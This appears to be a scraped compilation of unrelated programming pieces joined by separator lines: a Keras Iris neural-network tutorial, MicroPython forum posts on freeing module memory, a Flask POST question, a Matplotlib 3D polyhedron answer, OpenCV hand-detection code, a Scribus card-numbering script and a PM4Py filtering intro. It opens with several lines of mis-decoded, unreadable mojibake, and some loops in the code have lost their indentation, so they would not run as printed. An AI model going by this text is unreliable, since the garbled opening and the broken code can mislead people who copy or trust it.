繝槭え繧ケ辟。縺励〒繧�繧九↑繧峨�∝ソ�隕√↓縺ェ繧九°繧ゅ@繧後↑縺�縲ら判髱「縺ョ蝗櫁サ「縲√せ繧ッ繝ュ繝シ繝ォ遲峨′縺ァ縺阪↑縺�縺ョ縺ァ縲√Δ繝�繝ェ繝ウ繧ー縺励↓縺上>縲ゑシ亥宵縲∽ク企擇縲∝コ暮擇縲∵ュ」髱「縺ェ縺ゥ縺ョ繧キ繝ァ繝シ繝医き繝�繝医r霄ォ縺ォ逹�縺代k縺溘a縺ォ縲∵覆縺医※繝槭え繧ケ繧貞ー√§繧九�ョ繧ゆク�縺、縺ョ謇九°繧ゅ@繧後↑縺�縲ゑシ�
繝槭え繧ケ繧ゅ�∽コ後�懊ち繝ウ縺ョ縺ァ縺ッ縺�繧√��
蜿ウ縺ィ蟾ヲ縺ョ髢薙↓縲∽クュ螟ョ縺ョ繧ケ繧ッ繝ュ繝シ繝ォ縺ョ繧�縺、縺後▽縺�縺ヲ縺ェ縺�縺ィ縺�繧√��
繝槭え繧ケ縺ョ險ュ螳壹�ッ縲√%縺薙r蜿ら�ァ縺励◆縺後��
縺薙≧繧�縺」縺溘��
縲後↑縺懊°縲≫�戳reeCAD窶昴′郢ー繧願ソ斐@繝�繧ヲ繝ウ繝ュ繝シ繝峨&繧後k縲阪→諤昴▲縺溘i窶ヲ
web繝悶Λ繧ヲ繧カ縺ョ縲√ち繝悶r豸医&縺ェ縺�繧ッ繧サ縺後≠縺」縺ヲ縲√ム繧ヲ繝ウ繝ュ繝シ繝峨し繧、繝医�ョ繝壹�シ繧ク繧帝幕縺�縺溘ち繝悶′縲√★縺」縺ィ谿九▲縺ヲ縺溘○縺�縺�縺」縺溘�ゆサ雁セ後�ッ縲√%縺�縺�縺�縺薙→縺檎┌縺�繧医≧縺ォ閾エ縺励∪縺励※蛟吮�ヲ
莉頑怦縺ッ濶イ縲�縺ゅ▲縺溘〒蛟吮�ヲ
譁ー縺励>莠九□繧峨¢縺ァ縲∬ャ阮ャ繧偵◆縺上&繧馴」イ繧薙□縺ァ蛟吮�ヲ縲ゆコ医a縲∽コ磯亟邱壹r蠑オ縺」縺ヲ縺�縺溘♀縺九£縺ァ縲∬ャ逧�縺ォ縺ッ縲∽ス輔→繧ゅ↑縺城℃縺斐○縺溘��
縺薙l縺九i繧ゅ�∽ス輔→縺九d縺」縺ヲ縺�縺代◎縺�縺ェ豌励′縺励※縺�縺セ縺励※蛟吶��
|
Overview
This will be the third article in a four-part series covering thefollowing:
Dataset analysis- We will present and discuss a dataset selected for our machine learning experiment. This will include some analysis and visualisations to give us a better understanding of what we're dealing with.
Experimental design- Before we conduct our experiment, we need to have a clear idea of what we're doing. It's important to know what we're looking for, how we're going to use our dataset, what algorithms we will be employing, and how we will determine whether the performance of our approach is successful.
Implementation- We will use the Keras API on top of TensorFlow to implement our experiment. All code will be in Python, and at the time of publishing everything is guaranteed to work within a Kaggle Notebook.
Results- Supported by figures and statistics, we will have a look at how our solution performed and discuss anything interesting about the results.
Implementation
In the last article we covered a number of experimental design issues and made some decisions for our experiments. We decided to compare the performance of two simple artificial neural networks on the Iris Flower dataset. The first neural network will be the control arm, and it will consist of a single hidden layer of four neurons. The second neural network will be the experimental arm, and it will consist of a single hidden layer of five neurons. We will train both of these using default configurations supplied by the Keras library and collect thirty accuracy samples per arm. We will then apply the Wilcoxon Rank Sums test to test the significance of our results.
A simple training and testing strategy
With our dataset analysis and experimental design complete, let's jump straight into coding up the experiments.
If your desired dataset is hosted on Kaggle, as it is with the Iris Flower Dataset, you can spin up a Kaggle Notebook easily through the web interface:
Creating a Kaggle Notebook with the Iris dataset ready for use.
You're also welcome to use your own development environment, provided you can load the Iris Flower dataset.
Import packages
Before we can make use of the many libraries available for Python, we need to import them into our notebook. We're going to need numpy, pandas, tensorflow, keras, and sklearn. Depending on your development environment these may already be installed and ready for importing. You'll need to install them if that's not the case.
import numpy as np # linear algebra
import pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)
import tensorflow as tf # dataflow programming
from tensorflow import keras # neural networks API
from sklearn.model_selection import train_test_split # dataset splitting
If you're using a Kaggle Kernel notebook you can just update the default cell. Below you can see I've included imports for tensorflow, keras, and sklearn.
To support those using their own coding environment, I have listed the version numbers for the imported packages below:
tensorflow==1.11.0rc1
scikit-learn==0.19.1
pandas==0.23.4
numpy==1.15.2
Preparing the dataset
First, we load the Iris Flower dataset into a pandas DataFrame using the following code:
# Load iris dataset into dataframe
iris_data = pd.read_csv("/kaggle/input/Iris.csv")
Input parameters
Now, we need to separate the four input parameters from the classification labels. There are multiple ways to do this, but we're going to use pandas.DataFrame.iloc, which allows selection from the DataFrame using integer indexing.
# Splitting data into training and test set
X = iris_data.iloc[:,1:5].values
With the above code we have selected all the rows (indicated by the colon) and the columns at index 1, 2, 3, and 4 (indicated by the 1:5). You may be wondering why the column at index 5 was not included even though we specified 1:5; that's because Python slicing runs from the start index up to, but not including, the stop index. If we wanted the column at index 5 as well, we'd need to specify 1:6. It's important to remember that Python's indexing starts at 0, not 1. If we had specified 0:5, we would also be selecting the "Id" column.
To remind ourselves of what columns are at index 1, 2, 3, and 4, let's use the pandas.DataFrame.head() method from the first part.
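A single call is enough for that (a sketch; iris_data is the DataFrame loaded above):
iris_data.head()   # shows the first five rows; Id is at index 0 and Species at index 5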
Samples from the Iris Flower dataset with the column indices labelled in red.
We can also print out the contents of our new variable, X, which is storing all the Sepal Length/Width and Petal Length/Width data for our 150 samples. This is all of our input data.
The input data selected from the Iris Flower dataset.
For now, that is all the processing needed for the input parameters.
Classification labels
We know from our dataset analysis in part 1 that our samples are classified into three categories, "Iris-setosa", "Iris-virginica", and "Iris-versicolor". However, this alphanumeric representation of the labels is not compatible with our machine learning functions, so we need to convert them into something numeric.
Again, there are many ways to achieve a similar result, but let's use pandas features for categorical data. By explicitly selecting the Species column from our dataset as being of the category datatype, we can use pandas.Series.cat.codes to get numeric values for our class labels.
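A minimal sketch of that conversion (my own code; the variable name y is chosen so that it matches the to_categorical() call below):
# cast Species to the pandas 'category' dtype and take its integer codes
y = iris_data["Species"].astype("category").cat.codes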
We have one extra step, because we plan on using the categorical_crossentropy objective function to train our model. The Keras documentation gives the following instructions:
When using the
categorical_crossentropy loss, your targets should be in categorical format (e.g. if you have 10 classes, the target for each sample should be a 10-dimensional vector that is all-zeros except for a 1 at the index corresponding to the class of the sample).
Keras Documentation (https://keras.io/losses)
What this means is we will need to use One-hot encoding. This is quite typical for categorical data which is to be used with machine learning algorithms. Here is an example of One-hot encoding using the Iris Flower dataset:
One-hot encoding of the Iris Flower dataset class labels.
You can see that each classification label has its own column, so Setosa is \(1,0,0\), Virginica is \(0,1,0\), and Versicolor is \(0,0,1\).
Luckily, encoding our labels using Python and Keras is easy, and we've already completed the first step, which is converting our alphanumeric classes to numeric ones. To convert to One-hot encoding we can use keras.utils.to_categorical():
# Use One-hot encoding for class labels
Y = keras.utils.to_categorical(y,num_classes=None)
Training and testing split
In the previous part of this series we decided on the following:
The Iris Flower dataset is relatively small at exactly 150 samples. Because of this, we will use 70% of the dataset for training, and the remaining 30% for testing, otherwise our test set will be a little on the small side.
Machine Learning with Kaggle Notebooks - Part 2
This is where sklearn.model_selection.train_test_split() comes in. This function will split our dataset into a randomised training and testing subset:
# split into randomised training and testing subset
X_train, X_test, y_train, y_test = train_test_split(X,Y,test_size=0.3,random_state=0)
This code splits the data, giving 30% (45 samples) to the testing set and the remaining 70% (105 samples) to the training set. The 30/70 split is defined using test_size=0.3, and random_state=0 defines the seed for the randomisation of the subsets.
These have been spread across four new arrays storing the following data:
X_train: the input parameters, to be used for training.
y_train: the classification labels corresponding to the X_train above, to be used for training.
X_test: the input parameters, to be used for testing.
y_test: the classification labels corresponding to the X_test above, to be used for testing.
Before moving on, I recommend you have a closer look at the above four variables, so that you understand the division of the dataset.
Neural networks with Keras
Keras is the software library we will be using through Python, to code up and conduct our experiments. It's a user friendly high-level neural networks library which in our case will be running on top of TensorFlow. What is most attractive about Keras is how quickly you can go from your design to the result.
Configuring the model
The keras.Sequential() model allows you to build a neural network by stacking layers. You can add layers using the add() method, which in our case will be Dense() layers. A dense layer is a layer in which every neuron is connected to every neuron in the next layer. Dense() expects a number of parameters, e.g. the number of neurons to be on the layer, the activation function, the input_shape (if it is the first layer in the model), etc.
model = keras.Sequential()
model.add(keras.layers.Dense(4, input_shape=(4,), activation='tanh'))
model.add(keras.layers.Dense(3, activation='softmax'))
In the above code we have created our empty model and then added two layers, the first is a hidden layer consisting of four neurons which are expecting four inputs. The second layer is the output layer consisting of our three output neurons.
We then need to configure our model for training, which is achieved using the compile() method. Here we will specify our optimiser to be Adam(), configure for categorical classification, and specify our use of accuracy for the metric.
model.compile(keras.optimizers.Adam(), 'categorical_crossentropy', metrics=['accuracy'])
At this point, you may wish to use the summary() method to confirm you've built the model as intended:
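That is a single call (sketch):
model.summary()   # prints the layer-by-layer structure and parameter counts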
Training the model
Now comes the actual training of the model! We're going to use the fit() method of the model and specify the training input data and desired labels, the number of epochs (the number of times the training algorithm sees the entire dataset), and a flag to set the verbosity of the process to silent. Setting the verbosity to silent is entirely optional, but it helps us manage the notebook output.
model.fit(X_train, y_train, epochs=300, verbose=0)
If you're interested in receiving more feedback during the training (or optimisation) process, you can remove the assignment of the verbose flag when invoking the fit() method to use the default value. Now when the training algorithm is being executed, you will see output at every epoch:
Testing the model
After the neural network has been trained, we want to evaluate it against our test set and output its accuracy. The evaluate() method returns a list containing the loss value at index 0 and, in this case, the accuracy metric at index 1.
accuracy = model.evaluate(X_test, y_test)[1]
If we run all the code up until this point and output the contents of our accuracy variable, we should see something similar to the following:
Generating all our results
Up until this point, we have successfully prepared the Iris Flower dataset, configured our model, trained our model, evaluated it using the test set, and reported its accuracy. However, this reported accuracy is only one sample of our desired thirty.
We can do this with a simple loop to repeat the process thirty times, and a list to store all the results. This only requires some minor modifications to our existing code:
results_control_accuracy = []
for i in range(0,30):
model = keras.Sequential()
model.add(keras.layers.Dense(4, input_shape=(4,), activation='tanh'))
model.add(keras.layers.Dense(3, activation='softmax'))
model.compile(keras.optimizers.Adam(lr=0.04),'categorical_crossentropy',metrics=['accuracy'])
model.fit(X_train,y_train,epochs=100, verbose=0)
accuracy = model.evaluate(X_test, y_test)[1]
results_control_accuracy.append(accuracy)
print(results_control_accuracy)
This will take a few minutes to execute depending on whether you're using a Kaggle Kernel notebook or your own development environment, but once it has you should see a list containing the accuracy results for all thirty of the executions (but your results will vary):
[0.9333333359824286, 0.9777777791023254, 0.9777777791023254, 0.9777777791023254, 0.9777777791023254, 0.9777777791023254, 0.9777777791023254, 0.9777777791023254, 0.9555555568801032, 0.9777777791023254, 0.9777777791023254, 0.9777777791023254, 0.9777777791023254, 0.6000000052981906, 0.9777777791023254, 0.9777777791023254, 0.9777777791023254, 0.9111111124356588, 0.9777777791023254, 0.9777777791023254, 0.9777777791023254, 0.9777777791023254, 0.9777777791023254, 0.9777777791023254, 0.9555555568801032, 0.9777777791023254, 0.9777777791023254, 0.9777777791023254, 0.9777777791023254, 0.9111111124356588]
These are the results for our control arm, let's now do the same for our experimental arm. The experimental arm only has one difference: the number of neurons on the hidden layer. We can re-use our code for the control arm and just make a single modification where:
model.add(keras.layers.Dense(4, input_shape=(4,), activation='tanh'))
is changed to:
model.add(keras.layers.Dense(5, input_shape=(4,), activation='tanh'))
Of course, we'll also need to change the name of the list variable so that we don't overwrite the results for our control arm. The code will end up looking like this:
results_experimental_accuracy = []
for i in range(0,30):
model = keras.Sequential()
model.add(keras.layers.Dense(5, input_shape=(4,), activation='tanh'))
model.add(keras.layers.Dense(3, activation='softmax'))
model.compile(keras.optimizers.Adam(lr=0.04),'categorical_crossentropy',metrics=['accuracy'])
model.fit(X_train,y_train,epochs=100, verbose=0)
accuracy = model.evaluate(X_test, y_test)[1]
results_experimental_accuracy.append(accuracy)
print(results_experimental_accuracy)
After executing the above and waiting a few minutes, we will have our second set of results:
[0.9111111124356588, 0.9555555568801032, 0.9555555568801032, 0.9777777791023254, 0.9777777791023254, 0.9777777791023254, 0.9555555568801032, 0.933333334657881, 0.9777777791023254, 0.9777777791023254, 0.9777777791023254, 0.9555555568801032, 0.9777777791023254, 0.933333334657881, 0.9777777791023254, 0.9777777791023254, 0.9777777791023254, 0.9777777791023254, 0.9777777791023254, 0.9777777791023254, 0.9777777791023254, 0.9777777791023254, 0.9333333359824286, 0.9777777791023254, 0.9777777791023254, 0.9333333359824286, 0.9777777791023254, 0.9555555568801032, 0.9777777791023254, 0.9777777791023254]
Saving the results
The results for our experiment have been generated, and it's important that we save them somewhere so that we can use them later. There are multiple approaches to saving or persisting your data, but we are going to make use of pandas.DataFrame.to_csv():
pd.DataFrame(results_control_accuracy).to_csv('results_control_accuracy.csv', index=False)
pd.DataFrame(results_experimental_accuracy).to_csv('results_experimental_accuracy.csv', index=False)
The above code will save your results to individual files corresponding to the arm of the experiment. Where the files go depends entirely on your development environment. If you're developing in your own local environment, then you will likely find the files in the same folder as your notebook or script. If you're using a Kaggle Notebook, it is important that you click the blue commit button in the top right of the page.
It will take a few minutes to commit your notebook but once it's done, you know your file is safe. It's not immediately obvious where the files have been stored, but you can double check their existence by repeating the following steps:
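Later, when the results are needed again (for example for the significance test in the next part of this series), they can be read straight back into DataFrames. A sketch, assuming the CSV files are available alongside the notebook:
results_control_accuracy = pd.read_csv("results_control_accuracy.csv")
results_experimental_accuracy = pd.read_csv("results_experimental_accuracy.csv")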
Conclusion
In this article we prepared our dataset such that it was ready to be fed into our neural network training and testing process. We then built and trained our neural network models using Python and Keras, followed by some simple automation to generate thirty samples per arm of our experiment.
In the next part of this four-part series, we will have a look at how our solutions performed and discuss anything interesting about the results. This will include some visualisation, and we may even return to our experiment code to produce some new results.
|
Is there any way to remove an imported module from RAM?
E.g. it would make sense for untplib/NTPClient, which usually only needs to be used once during the boot process.
Can a class instantiated as an object be deleted from RAM with the "del" statement?
As far as I've been able to tell, the memory is released if you delete it from sys.modules and also remove any other references to it (then call gc() if you want)
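For what it's worth, here is a minimal sketch of that approach (the module name and usage are only illustrative; gc.mem_free() is the MicroPython call for checking free heap):
Code: Select all
import sys, gc

gc.collect()
print(gc.mem_free())          # free RAM before

import untplib                # a one-shot module, e.g. used to set the clock at boot
# ... use it once here ...

del sys.modules['untplib']    # drop the cached module object
del untplib                   # drop our own reference as well
gc.collect()
print(gc.mem_free())          # free RAM after the cleanup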
I didn't know about those "interned strings" though.
If we delete a module, then import it again later, does it leak? (I don't know the answer to this).
It seems reasonable to import a module, do some setup work (e.g. at reset), then when finished, delete the module to allow more ram for later usage.
markxr wrote: If we delete a module, then import it again later, does it leak? (I don't know the answer to this). It seems reasonable to import a module, do some setup work (e.g. at reset), then when finished, delete the module to allow more ram for later usage.
It should not leak, but it can worsen the memory fragmentation.
Instead of deleting a module after your work with it is done, it seems much better to simply avoid public globals in your modules altogether; the modules themselves only take up a little bit of space -- the rest is allocated dynamically as you use it.
I'm having problems with unloading modules, the RAM does not get freed.
I'm using this function to delete a module:
Code: Select all
def unloadModule(mod):
    # removes module from the system
    mod_name = mod.__name__
    if mod_name in sys.modules:
        del sys.modules[mod_name]
I am importing a module and call one function. Then I delete it like that:
Code: Select all
from pysmartnode.helpers import helper
helper.help()
unloadModule(helper)
del helper
But the RAM is only a small amount higher than with the module imported, far away from the free RAM before I imported the module.
Kevin Köck
Micropython Smarthome Firmware (with Home-Assistant integration): https://github.com/kevinkk525/pysmartnode
It was not in sys.modules anymore, and I don't have a reference to the module itself, as I just call a function and then delete the module.
pysmartnode and pysmartnode.helpers have been loaded before already and other modules in these packages are being used.
My goal is to outsource certain functions that are only needed once to different modules. Then I can just import these if they are necessary and unload them afterwards, freeing up some RAM that would otherwise be used by all the functions being in one module although only 20% might be used (it depends on user configuration, etc).
Kevin Köck
Micropython Smarthome Firmware (with Home-Assistant integration): https://github.com/kevinkk525/pysmartnode
Yeah, I don't think it is that simple, guys.
The interned strings of that module will still exist in RAM:
import micropython
micropython.qstr_info(1)
Every string lives there; that is where the memory that didn't get freed is.
How to delete interned strings, you may ask; I'm working on it :)
|
Good day.
I'm making a POST API request. Here is the code:
from flask import Flask
from flask import jsonify, request

app = Flask(__name__)

@app.route('/api/func/<int:id>/', methods=['POST'])
def func(id):
    data = request.json
    return jsonify(data)

app.run(...)
The Flask web server works fine. It handles GET requests normally.
When I send a POST request with data = {'data': 'some_data'}
it returns data = None.
I make the request with curl:
curl -i -X POST -d "{'data': 'some_data'}" http://IP:PORT/api/func/<id>/
and it returns a response where
null
is exactly the returned data.
It should have returned {'data': 'some_data'}.
What am I doing wrong?
UPD: same story with a PUT request, request.json is empty.
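A likely cause, though it is not confirmed in the post: Flask only populates request.json when the request is sent with a Content-Type: application/json header and a body that is valid JSON (double quotes), and the curl call above provides neither. A minimal server-side sketch that sidesteps the mimetype check:
@app.route('/api/func/<int:id>/', methods=['POST', 'PUT'])
def func(id):
    # force=True parses the body as JSON regardless of the Content-Type header;
    # silent=True returns None instead of raising when the body is not valid JSON.
    data = request.get_json(force=True, silent=True)
    return jsonify(data)
Alternatively, keep request.json on the server and fix the client call instead, e.g. curl -X POST -H "Content-Type: application/json" -d '{"data": "some_data"}' http://IP:PORT/api/func/1/ (note the double quotes inside the JSON body; the 1 merely stands in for an id).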
|
I am trying to use Python and Matplotlib to render a 3D surface of a polyhedron, given by
However, my code (shown below) does not seem to draw it correctly. How should this be done instead?
Failed attempt:
%matplotlib inline
import numpy as np
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
from matplotlib import cm
from matplotlib.ticker import LinearLocator, FormatStrFormatter

delta = 0.1

def x_func(x):
    return abs(x)
def y_func(y):
    return abs(y)
def z_func(z):
    return abs(z)

x = np.arange(-1, 1, delta)
x1 = x_func(x)
y = np.arange(-1, 1, delta)
y1 = y_func(y)
X, Y = meshgrid(x1, y1)
z = np.arange(-1, 1, delta)
Z = z_func(z)

fig = plt.figure()
ax = fig.gca(projection='3d')
ax.set_xlim([-1,1])
ax.set_ylim([-1,1])
ax.set_zlim([-1,1])
surf = ax.plot_surface(X, Y, Z, rstride=1, cstride=1, cmap=cm.RdBu, linewidth=0.1)
Here is a solution:
import mpl_toolkits.mplot3d as a3
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.colors as colors
import scipy as sp

# Vertex data
verts = [
    (-1, -1, -1),
    (-1, -1, 1),
    (-1, 1, 1),
    (-1, 1, -1),
    (1, -1, -1),
    (1, -1, 1),
    (1, 1, 1),
    (1, 1, -1)
]

# Face data
faces = np.array([
    [0, 1, 2, 3],
    [4, 5, 6, 7],
    [0, 3, 7, 4],
    [1, 2, 6, 5],
    [0, 1, 5, 4],
    [2, 3, 7, 6]
])

ax = a3.Axes3D(plt.figure())
ax.dist = 30
ax.azim = -140
ax.elev = 20
ax.set_xlim([-1, 1])
ax.set_ylim([-1, 1])
ax.set_zlim([-1, 1])

for i in np.arange(len(faces)):
    square = [verts[faces[i, 0]], verts[faces[i, 1]], verts[faces[i, 2]], verts[faces[i, 3]]]
    face = a3.art3d.Poly3DCollection([square])
    face.set_color(colors.rgb2hex(sp.rand(3)))
    face.set_edgecolor('k')
    face.set_alpha(0.5)
    ax.add_collection3d(face)

plt.show()
The output figure looks like this: the surface of a cube.
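As an aside (not part of the original answer), newer Matplotlib versions have removed fig.gca(projection='3d') and scipy's rand, so roughly the same idea can be written as:
import numpy as np
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d.art3d import Poly3DCollection

verts = np.array([(-1, -1, -1), (-1, -1, 1), (-1, 1, 1), (-1, 1, -1),
                  (1, -1, -1), (1, -1, 1), (1, 1, 1), (1, 1, -1)])
faces = [[0, 1, 2, 3], [4, 5, 6, 7], [0, 3, 7, 4],
         [1, 2, 6, 5], [0, 1, 5, 4], [2, 3, 7, 6]]

fig = plt.figure()
ax = fig.add_subplot(projection='3d')
ax.set_xlim([-1, 1]); ax.set_ylim([-1, 1]); ax.set_zlim([-1, 1])

rng = np.random.default_rng()
for face in faces:
    poly = Poly3DCollection([verts[face]])   # one quadrilateral per face
    poly.set_color(tuple(rng.random(3)))     # random RGB colour per face
    poly.set_edgecolor('k')
    poly.set_alpha(0.5)
    ax.add_collection3d(poly)
plt.show()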
|
Code: Select all
from .cv2 import *
ImportError: libQtTest.so.4: cannot open shared object file: No such file or directory
The libraries that come up are libQtTest, libatlas and libjasper.
For now I'm trying to remove this error in the following code, but it shows the same error in other code too. I've updated my Pi three times.
Code: Select all
import cv2
import numpy as np
import time

#Open Camera object
cap = cv2.VideoCapture(0)

#Decrease frame size
cap.set(cv2.cv.CV_CAP_PROP_FRAME_WIDTH, 1000)
cap.set(cv2.cv.CV_CAP_PROP_FRAME_HEIGHT, 600)

def nothing(x):
    pass

# Function to find angle between two vectors
def Angle(v1,v2):
    dot = np.dot(v1,v2)
    x_modulus = np.sqrt((v1*v1).sum())
    y_modulus = np.sqrt((v2*v2).sum())
    cos_angle = dot / x_modulus / y_modulus
    angle = np.degrees(np.arccos(cos_angle))
    return angle

# Function to find distance between two points in a list of lists
def FindDistance(A,B):
    return np.sqrt(np.power((A[0][0]-B[0][0]),2) + np.power((A[0][1]-B[0][1]),2))

# Creating a window for HSV track bars
cv2.namedWindow('HSV_TrackBar')

# Starting with 100's to prevent error while masking
h,s,v = 100,100,100

# Creating track bar
cv2.createTrackbar('h', 'HSV_TrackBar',0,179,nothing)
cv2.createTrackbar('s', 'HSV_TrackBar',0,255,nothing)
cv2.createTrackbar('v', 'HSV_TrackBar',0,255,nothing)

while(1):
    #Measure execution time
    start_time = time.time()
    #Capture frames from the camera
    ret, frame = cap.read()
    #Blur the image
    blur = cv2.blur(frame,(3,3))
    #Convert to HSV color space
    hsv = cv2.cvtColor(blur,cv2.COLOR_BGR2HSV)
    #Create a binary image with where white will be skin colors and rest is black
    mask2 = cv2.inRange(hsv,np.array([2,50,50]),np.array([15,255,255]))
    #Kernel matrices for morphological transformation
    kernel_square = np.ones((11,11),np.uint8)
    kernel_ellipse= cv2.getStructuringElement(cv2.MORPH_ELLIPSE,(5,5))
    #Perform morphological transformations to filter out the background noise
    #Dilation increase skin color area
    #Erosion increase skin color area
    dilation = cv2.dilate(mask2,kernel_ellipse,iterations = 1)
    erosion = cv2.erode(dilation,kernel_square,iterations = 1)
    dilation2 = cv2.dilate(erosion,kernel_ellipse,iterations = 1)
    filtered = cv2.medianBlur(dilation2,5)
    kernel_ellipse= cv2.getStructuringElement(cv2.MORPH_ELLIPSE,(8,8))
    dilation2 = cv2.dilate(filtered,kernel_ellipse,iterations = 1)
    kernel_ellipse= cv2.getStructuringElement(cv2.MORPH_ELLIPSE,(5,5))
    dilation3 = cv2.dilate(filtered,kernel_ellipse,iterations = 1)
    median = cv2.medianBlur(dilation2,5)
    ret,thresh = cv2.threshold(median,127,255,0)
    #Find contours of the filtered frame
    contours, hierarchy = cv2.findContours(thresh,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)
    #Draw Contours
    #cv2.drawContours(frame, cnt, -1, (122,122,0), 3)
    #cv2.imshow('Dilation',median)
    #Find Max contour area (Assume that hand is in the frame)
    max_area=100
    ci=0
    for i in range(len(contours)):
        cnt=contours[i]
        area = cv2.contourArea(cnt)
        if(area>max_area):
            max_area=area
            ci=i
    #Largest area contour
    cnts = contours[ci]
    #Find convex hull
    hull = cv2.convexHull(cnts)
    #Find convex defects
    hull2 = cv2.convexHull(cnts,returnPoints = False)
    defects = cv2.convexityDefects(cnts,hull2)
    #Get defect points and draw them in the original image
    FarDefect = []
    for i in range(defects.shape[0]):
        s,e,f,d = defects[i,0]
        start = tuple(cnts[s][0])
        end = tuple(cnts[e][0])
        far = tuple(cnts[f][0])
        FarDefect.append(far)
        cv2.line(frame,start,end,[0,255,0],1)
        cv2.circle(frame,far,10,[100,255,255],3)
    #Find moments of the largest contour
    moments = cv2.moments(cnts)
    #Central mass of first order moments
    if moments['m00']!=0:
        cx = int(moments['m10']/moments['m00']) # cx = M10/M00
        cy = int(moments['m01']/moments['m00']) # cy = M01/M00
    centerMass=(cx,cy)
    #Draw center mass
    cv2.circle(frame,centerMass,7,[100,0,255],2)
    font = cv2.FONT_HERSHEY_SIMPLEX
    cv2.putText(frame,'Center',tuple(centerMass),font,2,(255,255,255),2)
    #Distance from each finger defect(finger webbing) to the center mass
    distanceBetweenDefectsToCenter = []
    for i in range(0,len(FarDefect)):
        x = np.array(FarDefect[i])
        centerMass = np.array(centerMass)
        distance = np.sqrt(np.power(x[0]-centerMass[0],2)+np.power(x[1]-centerMass[1],2))
        distanceBetweenDefectsToCenter.append(distance)
    #Get an average of three shortest distances from finger webbing to center mass
    sortedDefectsDistances = sorted(distanceBetweenDefectsToCenter)
    AverageDefectDistance = np.mean(sortedDefectsDistances[0:2])
    #Get fingertip points from contour hull
    #If points are in proximity of 80 pixels, consider as a single point in the group
    finger = []
    for i in range(0,len(hull)-1):
        if (np.absolute(hull[i][0][0] - hull[i+1][0][0]) > 80) or ( np.absolute(hull[i][0][1] - hull[i+1][0][1]) > 80):
            if hull[i][0][1] <500 :
                finger.append(hull[i][0])
    #The fingertip points are 5 hull points with largest y coordinates
    finger = sorted(finger,key=lambda x: x[1])
    fingers = finger[0:5]
    #Calculate distance of each finger tip to the center mass
    fingerDistance = []
    for i in range(0,len(fingers)):
        distance = np.sqrt(np.power(fingers[i][0]-centerMass[0],2)+np.power(fingers[i][1]-centerMass[0],2))
        fingerDistance.append(distance)
    #Finger is pointed/raised if the distance of between fingertip to the center mass is larger
    #than the distance of average finger webbing to center mass by 130 pixels
    result = 0
    for i in range(0,len(fingers)):
        if fingerDistance[i] > AverageDefectDistance+130:
            result = result +1
    #Print number of pointed fingers
    cv2.putText(frame,str(result),(100,100),font,2,(255,255,255),2)
    #show height raised fingers
    #cv2.putText(frame,'finger1',tuple(finger[0]),font,2,(255,255,255),2)
    #cv2.putText(frame,'finger2',tuple(finger[1]),font,2,(255,255,255),2)
    #cv2.putText(frame,'finger3',tuple(finger[2]),font,2,(255,255,255),2)
    #cv2.putText(frame,'finger4',tuple(finger[3]),font,2,(255,255,255),2)
    #cv2.putText(frame,'finger5',tuple(finger[4]),font,2,(255,255,255),2)
    #cv2.putText(frame,'finger6',tuple(finger[5]),font,2,(255,255,255),2)
    #cv2.putText(frame,'finger7',tuple(finger[6]),font,2,(255,255,255),2)
    #cv2.putText(frame,'finger8',tuple(finger[7]),font,2,(255,255,255),2)
    #Print bounding rectangle
    x,y,w,h = cv2.boundingRect(cnts)
    img = cv2.rectangle(frame,(x,y),(x+w,y+h),(0,255,0),2)
    cv2.drawContours(frame,[hull],-1,(255,255,255),2)
    ##### Show final image ########
    cv2.imshow('Dilation',frame)
    ###############################
    #Print execution time
    #print time.time()-start_time
    #close the output video by pressing 'ESC'
    k = cv2.waitKey(5) & 0xFF
    if k == 27:
        break

cap.release()
cv2.destroyAllWindows()
|
This script creates numbered cards, e.g. admission tickets. The code (which, along with sample data, can also be found in the attachment):
Code: Select all
#!/usr/bin/env Python
# -*- coding: utf-8 -*-
import scribus

#################################
# Settings:

# Number of cards:
anzahl = 48
# Number of cards per page:
anzahl_pro_seite = 16
# Number of columns:
spalten = 2
# Offset of the right card from the left one, or of the lower card from the upper one:
abstand_x = 90.89
abstand_y = 33.5975
# Paragraph style for the text frame holding the number:
stil = "Nummer"
# Master page with the card layout:
musterseite = "Karten"
##################################
# Start of the script:

# Get information about the selected text frame:
x,y = scribus.getPosition()
breite, hoehe = scribus.getSize()
zaehler = int(scribus.getText())
anzahl_stellen = len(scribus.getText())

# Set various variables...
anzahl_pro_spalte = anzahl_pro_seite / spalten
x_neu = x
y_neu = y + abstand_y
zaehler_seite = 0
zaehler_spalte = 1

while zaehler != anzahl:
    while zaehler_seite < anzahl_pro_seite:
        while zaehler_spalte < anzahl_pro_spalte:
            zaehler = zaehler + 1
            zaehler_spalte = zaehler_spalte + 1
            rahmen = scribus.createText(x_neu, y_neu, breite, hoehe)
            scribus.setText(str(zaehler).zfill(anzahl_stellen), rahmen)
            scribus.setStyle(stil, rahmen)
            y_neu = y_neu + abstand_y
            if zaehler == anzahl:
                break
        if zaehler == anzahl:
            break
        x_neu = x_neu + abstand_x
        y_neu = y
        zaehler_seite = zaehler_seite + zaehler_spalte
        zaehler_spalte = 0
    if zaehler < anzahl:
        zaehler_seite = 0
        zaehler_spalte = 0
        scribus.newPage(-1, musterseite)
        scribus.gotoPage(scribus.pageCount())
        y_neu = y
        x_neu = x
Create the document: a paragraph style for the number called "Nummer" and a master page called "Karten" (the names can be changed in the script)
Adapt the script: set the variables in the first section to the desired values
Run the script: fill the first text frame with the desired starting number and the desired number of digits, e.g. 00023, and select it (important!); only then run the script.
Save the document, export it, print it and cut the cards (ideally with a cutting machine) ;-)
window) to equal vertical / horizontal spacing (in the warning that appears, choose to ignore locked objects)
License:
Regards
Julius
|
Filtering is one of the most important techniques in Process Mining, as it permits retrieving a smaller part of the log that contains the information we need to use/exploit.
In this page, a collection of techniques to filter a log object is reported. A log representation has the events already grouped in traces, and some techniques exist to filter the log:
Keeping/Removing the traces (so, all the events belonging to the traces) by a criteria
Trimming traces, keeping/removing events according to a specified criteria
To import a log object in PM4Py, the following code could be used:
import os
from pm4py.objects.log.importer.xes import factory as xes_importer

log_path = os.path.join("tests", "input_data", "receipt.xes")
log = xes_importer.import_log(log_path)
The sort instruction is quite important to make sure that traces are ordered:
from pm4py.objects.log.util import sorting
log = sorting.sort_timestamp(log)
Filtering on timeframe
A timeframe specifies a time interval that should be respected by traces or events. PM4Py provides the following filters on the timeframe.
Filtering traces contained in the timeframe
